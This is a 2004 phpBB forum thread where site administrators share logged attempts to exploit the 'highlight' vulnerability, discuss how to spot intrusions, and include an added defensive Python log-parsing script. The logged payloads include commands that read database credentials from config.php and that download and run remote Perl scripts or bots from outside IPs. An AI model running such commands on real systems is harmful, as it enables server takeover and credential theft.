More hack examples

The 2.0.x discussion forum has been locked; this will remain read-only. The 3.0.x discussion forum has been renamed phpBB Discussion.
rcardona
Registered User
Posts: 41
Joined: Fri Mar 26, 2004 3:57 am
Location: Austin, TX, USA


Post by rcardona »

Luckily I applied phpBB v2.0.11 hours before hack attempts started on our site. These are some explicit examples I've found in our logs. The locations of source IPs are interesting: Russia, Kosovo, Israel, Switzerland, Saudi Arabia, Egypt, Korea, the UK and, of course, the USA.

Origin: Moscow State University, Russia
Exploit body: ls
193.232.125.10 - - 20/Nov/2004:02:12:51 -0600 Mozilla/4.0 (compatible MSIE 6.0 X11 Linux i686) Opera 7.54 en

Origin: Moscow State University, Russia
Exploit body:
ls
id
uname -a
cat config.php | grep db
193.215.89.163 - - 21/Nov/2004:08:03:20 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)


Origin: Layered Tech Inc., Dallas TX
Exploit body: ls
67.18.205.82 - - 20/Nov/2004:02:13:09 -0600 -


Origin: Pristina, Kosovo
Exploit body:
id
213.149.96.50 - - 20/Nov/2004:11:59:02 -0600 -

Origin: Pristina, Kosovo
Exploit body:
wget -P /tmp 213.149.96.50/sh.pl
perl /tmp/sh.pl
80.80.174.141 - - 20/Nov/2004:11:59:42 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.1.4322)


Origin: Zurich, Switzerland
Exploit body:
echo
echo ---dcha0s---
id
echo ---dcha0s---
echo
213.144.148.19 - - 21/Nov/2004:15:40:35 -0600 -


Origin: Haifa, Israel
Exploit body: Value of dbname
217.132.230.81 - - 21/Nov/2004:08:25:52 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)


Origin: Castle Access Inc., San Diego CA
Exploit body:
echo SUKNAHLOHBLABEG
id
uname -a
wc -l /etc/passwd
cat /proc/version
uptime
echo SUKAENDHLOHBLA
69.43.151.31 - - 21/Nov/2004:09:03:01 -0600 Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6b


Origin: London, UK
Exploit body:
ls
id
uname -a
cat config.php | grep db
Value of: dbpasswd
62.3.32.33 - - 21/Nov/2004:18:06:49 -0600 Mozilla/4.0 (compatible MSIE 5.5 Windows 98 Win 9x 4.90)
62.3.32.34 - - 21/Nov/2004:18:06:26 -0600 Mozilla/4.0 (compatible MSIE 5.5 Windows 98 Win 9x 4.90)


Origin: Korea
Exploit body:
cd /tmp
wget http://211.115.73.198:9999/g
perl g
rm -rf g
211.115.73.198 - - 21/Nov/2004:19:11:11 -0600 Lynx/2.8.4rel.1 libwww-FM/2.14

Origin: Saudi Arabia
Exploit body: Values of dbname dbpasswd
212.138.47.11 - - 21/Nov/2004:23:00:43 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)
212.138.47.29 - - 21/Nov/2004:23:01:38 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)
212.138.47.29 - - 21/Nov/2004:23:01:59 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)

Origin: Egypt
Exploit body: Value of dbpasswd
62.139.110.160 - - 22/Nov/2004:09:10:28 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Last edited by rcardona on Tue Nov 23, 2004 3:58 pm, edited 1 time in total.

Gud
Former Team Member
Posts: 597
Joined: Fri Sep 07, 2001 11:02 am

Post by Gud »

Thank you, howdark security, for releasing a working exploit. :)

MerNion
Registered User
Posts: 83
Joined: Thu Jun 05, 2003 5:59 pm

Post by MerNion »

@rcardona: I tried to send you a PM but it fails. If you can, send me a PM with your e-mail so I can send you something. Thanks.

Einstein
Registered User
Posts: 247
Joined: Sat Oct 18, 2003 9:48 pm
Location: Finland

Post by Einstein »

How can you check if your site has been hacked? What are you searching for in the log files?

rcardona
Registered User
Posts: 41
Joined: Fri Mar 26, 2004 3:57 am
Location: Austin, TX, USA

Post by rcardona »

The greater issue of detecting hacks is a long post, but if you want a short read you can look at the info at tripwire.org or its commercial counterpart at tripwire.com.

For my search on the highlight exploit, I grepped through my Apache access_log for "highlight=%", and that is how I found the most recent attempts related to the v2.0.11 security fix, e.g.

grep "highlight=%" /var/log/httpd/access_log
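The same access_log check as a small parser rather than a bare grep, added here as an example and not code from the original post: it reads Apache combined-format lines, flags requests whose raw highlight parameter contains a percent-encoded character, decodes that value for the analyst, and tallies hits by source IP. The log lines, IPs and paths below are constructed placeholders, not entries from anyone's real log.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Apache "combined" format (placeholders, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Nov/2004:02:12:51 -0600] "GET /viewtopic.php?t=17&highlight=phpbb HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [20/Nov/2004:02:13:09 -0600] "GET /viewtopic.php?t=17&highlight=%41%42%43 HTTP/1.0" 200 5120 "-" "-"
198.51.100.7 - - [20/Nov/2004:02:13:40 -0600] "GET /viewtopic.php?t=18&highlight=%5Btest%5D HTTP/1.0" 200 4096 "-" "-"
203.0.113.9 - - [21/Nov/2004:08:03:20 -0600] "GET /index.php HTTP/1.1" 200 2048 "-" "Lynx/2.8.4rel.1"
"""

# Apache combined log format: ip ident user [timestamp] "METHOD target PROTO" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def highlight_hits(log_text):
    """Return one record per request whose raw highlight= value contains a '%'.

    A legitimate search term ("highlight=phpbb") has no percent-encoding, which is
    why rcardona's grep for "highlight=%" is a useful first filter.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = urlsplit(m.group("target")).query
        for param in query.split("&"):
            name, _, raw = param.partition("=")
            if name == "highlight" and "%" in raw:
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "ua": m.group("ua"),
                             "raw": raw, "decoded": unquote(raw)})
    return hits


def by_source(hits):
    """Count flagged requests per source IP, as in the per-origin list above."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = highlight_hits(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} highlight={h["raw"]!r} -> {h["decoded"]!r} ua={h["ua"]!r}')
    print(dict(by_source(found)))
```

Point `highlight_hits` at the contents of your own access_log to get the same list for real traffic; requests that carry a percent-encoded highlight value still deserve a look even when the server answered 200, since the page itself is what runs the exploit.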

troubleshoot
Registered User
Posts: 4
Joined: Sat Nov 20, 2004 10:37 pm

Post by troubleshoot »

Has anybody here seen what happens when one is vulnerable though?

I found a zombie bot (perl script, logged into an IRC server in Japan) that was launched via apache (showed up as a child process). There was nothing in the access logs showing use of the highlight exploit, but I really don't see any other way they could have got in.

I did find the output from a successful wget process in my apache error logs though.


--17:41:15--  http://219.254.35.93:9999/bot
           => `bot'
Connecting to 219.254.35.93:9999... connected.
HTTP request sent, awaiting response... 200 Ok
Length: 18,560 [text/plain]

    0K .......... ........                                   100%   11.96 KB/s

17:41:17 (11.96 KB/s) - `bot' saved [18560/18560]

sh: ypcat: command not found

I am thinking that when the highlight exploit is successful, it does not show up in the access logs. Can anyone else confirm?

Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

Even if the exploit is successful, you should still see it in your logs.
Proven Offensive Security Expertise. OSCP - GXPN

Technodreamer
Registered User
Posts: 42
Joined: Fri Apr 02, 2004 10:59 am

Post by Technodreamer »

I read about this howdark thing just today. I agree with PHPBB, they were not right for potentially risking several thousand forums on the internet.

I think PHPBB was right to take the howdark issue seriously, and take the correct measures to prevent damage to themselves, and therefore the other PHPBB communities on the internet.

However, it seems the issue is closed. So don't let me start something up again.

Anyway, I hate hackers who are out to cause damage. I hope you can repair the damage if any was caused.

scraptas
Registered User
Posts: 13
Joined: Sun Oct 17, 2004 7:47 pm

Post by scraptas »

Question for Techie-Mike

When talking about access logs, is everyone referring to website access logs or db access logs? :oops: Sorry if this is a stupid question...I believe I may have sent phpBB the wrong access log files. I sent what I could find...

Apologies if I did send the wrong access log file. :oops: Let me know, please.
Thanks.

Arty
Former Team Member
Posts: 16654
Joined: Wed Mar 06, 2002 2:36 pm
Name: Vjacheslav Trushkin

Post by Arty »

He's talking about website access logs.

And there is no point in sending your logs to the phpBB team - they won't do anything for you. There are hundreds of script kiddies who, thanks to the howdark idiots, are now trying to exploit every forum they can google.

If you got hacked then just get over it and update to 2.0.11.
Vjacheslav Trushkin / Arty.
Free phpBB 3.1 styles | New project: Iconify - modern SVG framework

Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

CyberAlien wrote: He's talking about website access logs.

And there is no point in sending your logs to the phpBB team - they won't do anything for you. There are hundreds of script kiddies who, thanks to the howdark idiots, are now trying to exploit every forum they can google.

If you got hacked then just get over it and update to 2.0.11.

CyberAlien: Whatever you have against us, you need to get over it. I asked for the access logs for a reason, a reason you need not concern yourself with.

scraptas: PM either myself, Neothermic, or Graham.

Arty
Former Team Member
Posts: 16654
Joined: Wed Mar 06, 2002 2:36 pm
Name: Vjacheslav Trushkin

Post by Arty »

8O I have absolutely nothing against you. I just didn't see the message where you asked for access logs and thought the user just wanted to send logs to someone from the team hoping someone would parse the logs for him. I'm sorry for this misunderstanding.

Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

CyberAlien wrote: 8O I have absolutely nothing against you. I just didn't see the message where you asked for access logs and thought the user just wanted to send logs to someone from the team hoping someone would parse the logs for him. I'm sorry for this misunderstanding.

My apologies then. Cheers. :)

scraptas
Registered User
Posts: 13
Joined: Sun Oct 17, 2004 7:47 pm

Post by scraptas »

Wow.. thanks for that CyberAlan... I am way over being attacked... I will never be over wanting to help bring these wackos to justice! Get over that and yourself... read before you get too froggy and jump next time. I think the mod/tech team here can handle enforcing things around here. Apology accepted. :)

Techie-Mike~ I have sent them to Neo, thanks.

SamG
Former Team Member
Posts: 3221
Joined: Fri Aug 31, 2001 6:35 pm
Location: Beautiful Northwest Lower Michigan
Name: Sam Graf

Post by SamG »

scraptas, CyberAlien made an honest mistake, and Techie-Micheal took care of any moderating this topic required. In any case, the phpBB.com rules require members to avoid "back seat" moderating (see http://www.phpbb.com/phpBB/rules.php#rule1c ). Thanks.
We should talk less, and say more.
